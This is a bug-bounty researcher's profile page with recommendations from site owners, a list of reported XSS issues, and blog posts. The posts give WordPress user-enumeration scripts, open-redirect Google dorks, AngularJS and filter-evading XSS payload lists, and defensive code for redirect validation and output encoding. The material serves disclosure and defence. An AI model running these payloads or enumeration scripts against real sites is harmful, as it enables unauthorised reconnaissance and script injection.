Coordinated and Responsible Vulnerability Disclosure Free Bug Bounty Program 456,207 coordinated disclosures
244,324 fixed vulnerabilities
604 bug bounties with 1224 websites
12,316 researchers, 962 honor badges

MiguelSantareno | Security Researcher Profile


Security researcher MiguelSantareno has already helped fix 950 vulnerabilities.



Researcher reputation:  140

Real name:
Miguel Santareno

About me:
http://miguelsantareno.eu

https://hackerone.com/miguel_santareno

https://bugcrowd.com/MiguelSantareno

https://www.exploit-db.com/google-hacking-database author 9699

http://www.hackersforcharity.org/community/index.php/profile/395-miguel-santareno/

https://pentesterlab.com/profile/Miguelsantareno

https://www.hackthebox.eu/profile/19625

How to contact me:
https://twitter.com/MiguelSantareno

https://www.linkedin.com/in/miguelsantareno/

Alternative Contacts:
[email protected]

Certifications & Diplomas:
MTA Security Essentials
CEH
CPTE
ISO/IEC 27001

Experience in Application Security
1-3 years

Award / Bug Bounty I prefer:
Recommendations.
Swag.
Money.

Halls of Fame:
Midas, Vodafone Portugal, NOS, MyHeritage, Oracle, Bosch, General Motors, Khan Academy, Impinj, U.S. Dept Of Defense, Alibaba, CERT-EU, Ford, Telefónica Germany, RATELIMITED, Informatica, IBM, BMW, Overstock's

Follow me on:
Twitter

Recommendations and Acknowledgements

    17 July, 2018
     DragonSGA Stefan from Cadenas:
Miguel has found an XSS vulnerability in our search page. The example he gave helped to test our fix. Thank you!
    15 May, 2018
     Lewisdh47 Dave from Avis:
I would like to thank Miguel for identifying the security issue, providing all relevant information to enable a fix to be deployed and confirming the resolution. Incredibly useful to get his input on the issue and his very helpful steps to reproduce were appreciated. Very helpful and friendly.
    9 May, 2018
     bubblegate James Murrells from Bubblegate:
Identified an XSS vulnerability on our website and was very friendly and supportive! Many thanks.
    26 September, 2017
     pmiguelr75 Pedro Rodrigues from Bluesoft:
Identified an XSS vulnerability in one website and showed us where it is.
After that we made changes in the code to solve it.
All solved.
Great help, great support.
    22 September, 2017
     thenrique Tulio from Spirit Fanfics:
Identified an XSS vulnerability in our website and provided all the details in order to solve it. Very friendly. Thanks
    22 September, 2017
     jonnyowls Jonathan from C5:
Miguel reported an XSS vulnerability in our website, it was remediated and retested very quickly. Excellent service
    1 September, 2017
     maswb19 Jay from PSA:
Helpfully notified us of an XSS vulnerability in one of our sites with the details we needed to replicate it and responded quickly to emails.
    10 August, 2017
     tgljamesuk James from The Graphics Line:
Miguel identified an XSS vulnerability on one of our websites, provided a step by step guide to reproduce the issue along with information on how to resolve it. He also re-tested after we applied a patch. Thank you Miguel!
    27 July, 2017
     ISOatUO Information Security Office from University of Otago:
Provided a simple proof of concept, allowing us to identify the cause easily and deploy a fix quickly.
    26 July, 2017
     kovyrin Oleksiy Kovyrin from Swiftype Inc:
Miguel has identified an XSS vulnerability on our website, provided us with necessary details to reproduce the issue and was very helpful re-testing after we applied the fixes. Thank you.


Honor Badges


Number of Secured Websites

10+ Websites
50+ Websites
500+ Websites
WEB SECURITY VETERAN
1000+ Websites

Advanced Security Research

WAF Bypasser
CSRF Master
30+ Reports
AppSec Logic Master
30+ Reports
Fastest Fix
Fix in 24 hours

Outstanding Achievements

Secured OBB
OBB Advocate
Improved OBB

Commitment to Remediate and Patch

Patch Master
55% Patched
Patch Guru
65% Patched
Patch Lord
75% Patched

Recommendations and Recognition

REPUTABLE
10+ Recommends
FAMOUS
25+ Recommends
GLOBALLY TRUSTED
50+ Recommends

Distinguished Blog Author

1 Post
3 Posts
5+ Posts

Research Statistics



Total reports:1290
Total reports on VIP sites:85
Total patched vulnerabilities:950
Recommendations received:14
Active since:20.06.2017

05.09.2019  WordPress basic auditing

WordPress readme (states the exact core version in its heading):
target/readme.html

WordPress license (with WordPress version):
target/license.txt

WordPress sample config:
target/wp-config-sample.php

WordPress installation script (should only answer "already installed" on a finished install):
target/wp-admin/install.php

WordPress upgrade script:
target/wp-admin/upgrade.php

WordPress setup config (if reachable on a site that has no wp-config.php yet, anyone can complete the install with their own database):
target/wp-admin/setup-config.php

WordPress REST API useful paths:
target/wp-json/wp/v2/users - enumerate users (id, display name and slug of every user with published posts)
target/wp-json/wp/v2/posts - enumerate posts
target/wp-json - API index (lists the available namespaces and routes)

Script to enumerate users through the author IDs of the blog (WordPress redirects target/?author=N to /author/<slug>/ for every existing user ID N, and the author links in the page read title="View all posts by <name>"; the loop checks IDs 1 to 30 and prints the names it finds):
for i in $(seq 1 30); do curl -s -L -i "target/?author=$i" | grep -E -i -o 'Location: .*/author/[^/]+|title="View all posts by [^"]+' | sed -E 's#.*/author/##; s#.*View all posts by ##' | sort -u; done

WordPress plugin readme or license (readme.txt carries the plugin version in its "Stable tag" line):
target/wp-content/plugins/plugin-name/readme.txt or /license.txt

WordPress theme readme, changelog or license (discloses the theme version):
target/wp-content/themes/theme-name/readme.txt, /changelog.txt or /license.txt
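The checks above as one script, added here as an example and not the author's own tooling: it probes the disclosure paths, reads the core version from readme.html, pulls user slugs from the REST users endpoint and enumerates the /?author=N redirects over the same 1..30 range as the shell loop. The fetcher is injectable, so the block runs offline against the constructed FAKE_SITE responses (assumed data, not a real site); http_fetch is the live variant. "http://target" is the page's own placeholder.

```python
import json
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Optional, Tuple

Response = Tuple[int, Dict[str, str], str]   # (status, headers, body)
Fetcher = Callable[[str], Response]

# Files that leak the WordPress version or show a never-cleaned-up install;
# none of them should answer 200 on a hardened site.
DISCLOSURE_PATHS = [
    "/readme.html",
    "/license.txt",
    "/wp-config-sample.php",
    "/wp-admin/install.php",
    "/wp-admin/upgrade.php",
    "/wp-admin/setup-config.php",
]


def version_from_readme(body: str) -> Optional[str]:
    """readme.html states the core version as '... Version 5.2.3' in its heading."""
    match = re.search(r"Version\s+(\d+(?:\.\d+)+)", body)
    return match.group(1) if match else None


def users_from_rest(body: str) -> List[str]:
    """/wp-json/wp/v2/users is a JSON list; 'slug' is usually the login name."""
    try:
        data = json.loads(body)
    except ValueError:
        return []
    if not isinstance(data, list):
        return []
    return [u["slug"] for u in data if isinstance(u, dict) and "slug" in u]


def author_from_redirect(headers: Dict[str, str]) -> Optional[str]:
    """/?author=N answers 301 to /author/<slug>/ when user id N exists."""
    location = headers.get("Location") or headers.get("location") or ""
    match = re.search(r"/author/([^/?#]+)", location)
    return match.group(1) if match else None


def audit(base: str, fetch: Fetcher, max_author_id: int = 30) -> dict:
    """Run the checks against base (e.g. 'http://target') with the given fetcher."""
    result = {"exposed": [], "version": None, "users": []}
    for path in DISCLOSURE_PATHS:
        status, _, body = fetch(base + path)
        if status == 200:
            result["exposed"].append(path)
            if path == "/readme.html":
                result["version"] = version_from_readme(body)
    status, _, body = fetch(base + "/wp-json/wp/v2/users")
    users = set(users_from_rest(body)) if status == 200 else set()
    for author_id in range(1, max_author_id + 1):   # same 1..30 range as the shell loop
        status, headers, _ = fetch(f"{base}/?author={author_id}")
        if status in (301, 302):
            slug = author_from_redirect(headers)
            if slug:
                users.add(slug)
    result["users"] = sorted(users)
    return result


def http_fetch(url: str) -> Response:
    """Live fetcher: a single GET that does not follow redirects, so the
    Location header of the /?author=N response stays visible."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None
    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(url, timeout=10) as resp:
            return resp.status, dict(resp.headers), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:          # 3xx/4xx/5xx arrive here
        return err.code, dict(err.headers), ""
    except urllib.error.URLError:
        return 0, {}, ""


# Constructed stand-in for a live site so the example runs offline (assumed data, not real).
FAKE_SITE = {
    "http://target/readme.html": (200, {}, '<h1 id="logo">WordPress<br /> Version 5.2.3</h1>'),
    "http://target/license.txt": (200, {}, "WordPress - Web publishing software"),
    "http://target/wp-json/wp/v2/users": (200, {}, json.dumps([{"id": 1, "name": "Site Admin", "slug": "admin"}])),
    "http://target/?author=1": (301, {"Location": "http://target/author/admin/"}, ""),
    "http://target/?author=2": (301, {"Location": "http://target/author/editor-jane/"}, ""),
}


def fake_fetch(url: str) -> Response:
    return FAKE_SITE.get(url, (404, {}, "Not Found"))


if __name__ == "__main__":
    print(audit("http://target", fake_fetch))
    # Against a real site: audit("https://example.org", http_fetch)
```

The REST endpoint and the ?author= redirect are merged into one set because they usually agree but not always: a user with no published posts is absent from wp/v2/users yet still redirects, and a site that has disabled the REST route still leaks through the redirect.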

05.09.2019  Payloads for all types of web attacks

02.04.2019  Google Dorks to find open redirects:

inurl:url=https
inurl:url=http
inurl:u=https
inurl:u=http
inurl:redirect?https
inurl:redirect?http
inurl:redirect=https
inurl:redirect=http
inurl:link=http
inurl:link=https
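What the dorks above find is a redirect-like parameter (url, u, redirect, link) carrying an absolute http(s) URL. The block below is an added example, not the author's code: redirect_candidates() picks those parameters out of a URL, including the bare redirect?http://... form, and safe_redirect_target() is the server-side gate that makes such a parameter harmless. The site origin "https://example.com/" and the test URLs are assumed values.

```python
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urljoin, urlsplit

# Parameter names the dorks key on; treated here as redirect-like.
REDIRECT_PARAMS = ("url", "u", "redirect", "link")


def redirect_candidates(page_url: str) -> List[Tuple[str, str]]:
    """(param, value) pairs where a redirect-like parameter holds an absolute
    http(s) URL. The bare form (.../redirect?http://...) has no parameter name
    and is reported with '' as the name."""
    query = urlsplit(page_url).query
    found = []
    if query.lower().startswith(("http://", "https://")):
        found.append(("", query))
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name.lower() in REDIRECT_PARAMS:
            for value in values:
                if value.lower().startswith(("http://", "https://")):
                    found.append((name, value))
    return found


def safe_redirect_target(target: str, site_base: str = "https://example.com/") -> Optional[str]:
    """Server-side gate for a redirect parameter: returns a same-origin absolute
    URL to send the browser to, or None when the target must be refused.
    site_base is an assumed value; use the application's own origin."""
    # Browsers turn backslashes into slashes, so "/\\evil.com" reaches the
    # browser as "//evil.com" even though urljoin treats it as a path: refuse early.
    if "\\" in target or target.startswith("//"):
        return None
    resolved = urlsplit(urljoin(site_base, target))
    site = urlsplit(site_base)
    if resolved.scheme not in ("http", "https"):
        return None            # javascript:, data:, vbscript: ...
    if resolved.netloc.lower() != site.netloc.lower():
        return None            # other host; netloc keeps userinfo, so user@evil fails too
    return resolved.geturl()


def is_safe_redirect(target: str, site_base: str = "https://example.com/") -> bool:
    return safe_redirect_target(target, site_base) is not None


if __name__ == "__main__":
    for url in ("https://site.tld/login?redirect=https://evil.com/&lang=en",
                "https://site.tld/redirect?http://evil.com"):
        print(url, "->", redirect_candidates(url))
    for target in ("/account", "https://evil.com/", "//evil.com/", "/\\evil.com",
                   "javascript:alert(1)", "https://example.com@evil.com/"):
        print(repr(target), "->", safe_redirect_target(target))
```

Comparing the whole netloc rather than only the hostname is deliberate: it rejects https://example.com@evil.com/ and https://example.com.evil.com/ without a second check, at the price of also rejecting an explicit :443 port, which a redirect parameter never legitimately needs.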

02.04.2019  Cross Site Scripting AngularJS payloads (by affected AngularJS version):

1.0.1 - 1.1.5

Mario Heiderich (Cure53)

{{constructor.constructor('alert(1)')()}}

1.2.0 - 1.2.1

Jan Horn (Google)

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

30.03.2019  List of basic Cross Site Scripting payloads

"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"--!><img src=x onerror=alert("OPENBUGBOUNTY")> 
'"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"><script>alert("OPENBUGBOUNTY")</script>
'"><script>confirm("OPENBUGBOUNTY")</script>
'"><script>prompt("OPENBUGBOUNTY")</script>
'"><svg/onload=alert(/OPENBUGBOUNTY/)>
'"><svg/onload=confirm(/OPENBUGBOUNTY/)>
'"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'>"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<img  src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<svg/onload=prompt(/OPENBUGBOUNTY/)>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert("OPENBUGBOUNTY")//>\x3exss.txt

'"><svg/onload=prompt`1`>
'"><svg/onload=alert`1`>
'"><svg/onload=confirm`1`>
'"><script>alert`1`</script> 
><script>alert`1`</script> 
'"><svg onload=prompt`openbugbounty`>
'"><svg onload=alert`openbugbounty`>
'"><svg onload=confirm`openbugbounty`>
<!'/*!"/*!/'/*/"/*--!><Input/Autofocus/*/Onfocus=confirm`OPENBUGBOUNTY`//><Svg>/
'"><svg/onload=alert(/openbugbounty/)>
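The variants in the lists above (backticks instead of parentheses, the \u0065 escape inside window['al\u0065rt'], a regex literal instead of a quoted string) exist to get past signature filters. The block below is an added example, not the author's code: it runs four of the listed payloads through a hypothetical keyword blocklist of the kind a simple WAF rule implements, shows which ones slip through, and then shows that contextual output encoding of the reflected value neutralises all of them regardless of the filter. The blocklist and the input template are assumptions.

```python
import html
import re
from typing import Dict, List

# Four payloads from the lists above, kept verbatim.
PAYLOADS: List[str] = [
    '"><svg/onload=prompt(/OPENBUGBOUNTY/)>',
    '\'"><script>alert("OPENBUGBOUNTY")</script>',
    '\'"><svg/onload=prompt`1`>',
    r"""<img  src="x:gif" onerror="window['al\u0065rt'](0)"></img>""",
]

# Hypothetical signature filter (assumed here, not any real WAF rule set).
BLOCKLIST = ("<script", "alert(", "prompt(", "confirm(")


def passes_blocklist(value: str) -> bool:
    """True when the value gets past the signature filter unchanged."""
    lowered = value.lower()
    return not any(sig in lowered for sig in BLOCKLIST)


def js_unescape(s: str) -> str:
    """Resolve JavaScript \\uXXXX escapes the way the engine does before the
    property lookup runs: window['al\\u0065rt'] is window['alert']."""
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)


def render_attribute_unsafe(value: str) -> str:
    """Reflection into a double-quoted attribute with no encoding (the bug)."""
    return '<input type="text" value="%s">' % value


def render_attribute(value: str) -> str:
    """Same template with contextual output encoding for an attribute value:
    < > & " ' all become entities, so the value can never close the attribute
    or open a tag, whatever the filter let through."""
    return '<input type="text" value="%s">' % html.escape(value, quote=True)


def injected(rendered: str) -> bool:
    """The template contributes exactly one opening tag; any further one was
    injected by the reflected value."""
    return len(re.findall(r"<[a-zA-Z]", rendered)) > 1


def evaluate() -> Dict[str, object]:
    return {
        "slip_past_blocklist": [p for p in PAYLOADS if passes_blocklist(p)],
        "inject_when_unescaped": sum(injected(render_attribute_unsafe(p)) for p in PAYLOADS),
        "inject_when_escaped": sum(injected(render_attribute(p)) for p in PAYLOADS),
    }


if __name__ == "__main__":
    for key, value in evaluate().items():
        print(key, "->", value)
    print(js_unescape(r"window['al\u0065rt']"))
```

The two survivors are the backtick call prompt`1` (a tagged template, so "prompt(" never appears) and the unicode-escaped property name; both execute in the browser exactly as alert would. The encoded template leaves all four inert, which is why the fix for every report in the list above is output encoding at the injection point, not a better blocklist.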

Reported Vulnerabilities


Domain  Reported    Status     Type
-       13.09.2018  unpatched  Cross Site Scripting
-       04.06.2018  unpatched  Cross Site Scripting
-       02.06.2018  patched    Cross Site Scripting
-       26.05.2018  patched    Cross Site Scripting
-       28.04.2018  patched    Cross Site Scripting
-       16.04.2018  patched    Cross Site Scripting
-       16.04.2018  unpatched  Cross Site Scripting
-       16.04.2018  patched    Cross Site Scripting
-       14.04.2018  patched    Cross Site Scripting
-       07.04.2018  patched    Cross Site Scripting
-       29.03.2018  patched    Cross Site Scripting
-       28.03.2018  patched    Cross Site Scripting
-       28.03.2018  patched    Cross Site Scripting
-       28.03.2018  patched    Cross Site Scripting
-       22.02.2018  patched    Cross Site Scripting
-       22.02.2018  patched    Cross Site Scripting
-       22.02.2018  patched    Cross Site Scripting
-       22.02.2018  patched    Cross Site Scripting
-       20.02.2018  patched    Cross Site Scripting
-       18.02.2018  patched    Cross Site Scripting
